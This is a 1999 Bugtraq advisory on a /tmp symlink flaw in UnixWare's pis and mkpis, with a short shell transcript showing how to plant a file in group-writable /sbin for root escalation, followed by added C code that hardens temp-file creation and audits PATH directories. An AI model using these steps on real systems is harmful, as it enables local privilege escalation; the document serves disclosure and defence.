
Re: UnixWare local pis exploit (mkpis as well)

daemon@ATHENA.MIT.EDU (Brock Tellier)
Wed Dec 29 20:23:23 1999

Message-Id:  <19991229165826.18412.qmail@nwcst322.netaddress.usa.net>
Date:         Wed, 29 Dec 1999 10:58:26 CST
Reply-To: Brock Tellier <btellier@USA.NET>
From: Brock Tellier <btellier@USA.NET>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

As a bonus, /usr/local/bin/mkpis is vulnerable to the same /tmp symlink
problem.  It has the same permissions as pis.

-Brock

---
Brock Tellier <btellier@USA.NET> wrote:
Greetings,

OVERVIEW 
A vulnerability in "/usr/local/bin/pis" on SCO UnixWare will allow any
user to create arbitrary files with group "sys" privileges.  A full root
compromise is then trivial.

BACKGROUND
As usual, I've only tested UnixWare 7.1.

DETAILS

By creating a symlink between /tmp/pisdata and any sys-owned file we can
overwrite that file with ps output.  If we point the symlink at a
non-existent file in a directory which we can write to (such as, say,
/sbin/ls), pis will create this file mode 666 owned by us, group of sys.

This is a fairly simple compromise.  /sbin is writable by group sys.  We
can create files in /sbin owned by us.  And root's default $PATH starts
with /sbin.

EXPLOIT

bash-2.02$ ls -dal /sbin
drwxrwxr-x    2 root     sys            3072 Dec 28 08:18 /sbin
bash-2.02$ ln -s /sbin/xnec /tmp/pisdata
bash-2.02$ pis
<program output>
bash-2.02$ ls -la /sbin/xnec
-rw-rw-rw-    1 xnec     sys            5896 Dec 28 08:28 /sbin/xnec
bash-2.02$ 


Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net
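The bug the advisory describes is a privileged program opening a fixed, predictable path in /tmp with O_CREAT and following whatever symlink sits there. The following is an added example, not code from the advisory or from SCO: it puts the naive pattern beside two hardened forms (O_EXCL|O_NOFOLLOW on the fixed name, and mkstemp(3) with an unpredictable name) and self-tests them in a private directory. The function names naive_create, safe_create, scratch_create and demo_symlink_redirect are hypothetical, and the planted link is constructed inside a throwaway directory.

```c
/* Added example (not from the advisory): creating a scratch file so that a
 * symlink planted at a predictable path such as /tmp/pisdata cannot redirect
 * the write.  All function names here are hypothetical. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: fixed path, O_CREAT without O_EXCL,
 * symlinks followed.  If the path is a symlink the open lands wherever it
 * points, and a missing target is created with the caller's privileges. */
int naive_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened on the same fixed name: never reuse an existing entry (O_EXCL,
 * which fails with EEXIST even for a dangling symlink) and never follow a
 * link at the final component (O_NOFOLLOW, ELOOP).  Mode 0600, not 0666. */
int safe_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Better still: no predictable name at all.  mkstemp(3) opens with
 * O_CREAT|O_EXCL and a random suffix, so nothing can be planted there in
 * advance.  Fills `out` with the chosen name and returns the fd. */
int scratch_create(char *out, size_t outlen)
{
    const char *dir = getenv("TMPDIR");
    if (dir == NULL || *dir == '\0') dir = "/tmp";
    if (snprintf(out, outlen, "%s/pisdata.XXXXXX", dir) >= (int)outlen) {
        errno = ENAMETOOLONG;
        return -1;
    }
    return mkstemp(out);
}

/* Self-test in a fresh private directory: plant a symlink (constructed, the
 * advisory's /tmp/pisdata trick) at a file that does not exist yet, then see
 * which creator is redirected.  Returns 1 when the hardened creator refuses
 * while the naive one does create the link's target. */
int demo_symlink_redirect(void)
{
    char dir[] = "/tmp/pisdemo.XXXXXX";
    char link[128], victim[128], scratch[128];
    int ok = 0, fd;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(link, sizeof link, "%s/pisdata", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, link) != 0) goto out;

    /* hardened creator: must fail and must leave the target uncreated */
    fd = safe_create(link);
    if (fd == -1 && (errno == EEXIST || errno == ELOOP)
        && access(victim, F_OK) != 0)
        ok = 1;
    if (fd >= 0) { close(fd); ok = 0; }

    /* mkstemp variant: succeeds, at a name nobody could have planted */
    setenv("TMPDIR", dir, 1);
    fd = scratch_create(scratch, sizeof scratch);
    if (fd < 0) ok = 0; else { close(fd); unlink(scratch); }

    /* naive creator: follows the link and brings the target into being */
    fd = naive_create(link);
    if (fd >= 0) close(fd);
    if (access(victim, F_OK) != 0) ok = 0;

out:
    unlink(victim); unlink(link); rmdir(dir);
    return ok;
}

int main(void)
{
    printf("hardened creator refuses a planted symlink: %s\n",
           demo_symlink_redirect() == 1 ? "yes" : "NO");
    return 0;
}
```

The O_EXCL|O_NOFOLLOW variant is the minimal fix when the file name must stay fixed; it turns the planted link into a hard failure that the program can log rather than a silent write elsewhere. mkstemp(3) removes the race entirely and is what a set-id program should use for scratch data, ideally under a directory that is not world-writable.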


____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
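The second half of the compromise needs a directory early in root's PATH that a non-root group or other users can write to (the advisory's /sbin, mode drwxrwxr-x root:sys). The following is an added example, not from the advisory or from SCO: a small audit that walks a colon-separated PATH and flags every directory that is group- or world-writable, plus an empty entry (which means the current directory). The functions dir_is_lax, audit_path and demo_audit are hypothetical, and the self-test builds its own 0775 and 0755 directories rather than touching the real /sbin.

```c
/* Added example (not from the advisory): audit a PATH string for directories
 * a non-owner could drop a program into.  Function names are hypothetical. */
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Nonzero when `dir` exists, is a directory, and is group- or world-writable.
 * The sticky bit is deliberately ignored: a PATH hijack only needs to create
 * a new file with the right name, which the sticky bit still permits. */
int dir_is_lax(const char *dir)
{
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) != 0;
}

/* Walk a colon-separated PATH, print each lax entry and return the count.
 * Empty entries are flagged too: they resolve to ".", which the user who
 * runs the command chooses.  Entries longer than PATH_MAX are skipped. */
int audit_path(const char *path)
{
    int lax = 0;
    const char *start = path;
    for (;;) {
        const char *end = strchr(start, ':');
        size_t n = end ? (size_t)(end - start) : strlen(start);
        char dir[PATH_MAX];
        if (n == 0) {
            puts("LAX: empty entry (current directory)");
            lax++;
        } else if (n < sizeof dir) {
            memcpy(dir, start, n);
            dir[n] = '\0';
            if (dir_is_lax(dir)) { printf("LAX: %s\n", dir); lax++; }
        }
        if (end == NULL) break;
        start = end + 1;
    }
    return lax;
}

/* Self-test with constructed directories: one 0775 (like the advisory's
 * /sbin, writable by its group) and one 0755, joined into a PATH.  Returns
 * the number of lax entries found, which should be exactly 1. */
int demo_audit(void)
{
    char lax_dir[] = "/tmp/pathdemo-lax.XXXXXX";
    char ok_dir[]  = "/tmp/pathdemo-ok.XXXXXX";
    char path[256];
    int n;
    if (mkdtemp(lax_dir) == NULL) return -1;
    if (mkdtemp(ok_dir) == NULL) { rmdir(lax_dir); return -1; }
    chmod(lax_dir, 0775);
    chmod(ok_dir, 0755);
    snprintf(path, sizeof path, "%s:%s", lax_dir, ok_dir);
    n = audit_path(path);
    rmdir(lax_dir);
    rmdir(ok_dir);
    return n;
}

int main(void)
{
    const char *p = getenv("PATH");
    int n = audit_path(p ? p : "");
    printf("%d lax PATH entr%s\n", n, n == 1 ? "y" : "ies");
    return n != 0;
}
```

Run as root the program reports on root's own PATH; the check that matters for this advisory is that nothing ahead of /usr/bin is writable by a group that a set-gid program runs as. A group-writable system directory owned by root:root is arguably acceptable, so a stricter site policy can add a check on st_gid, but the bit test alone already catches the /sbin case described above.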

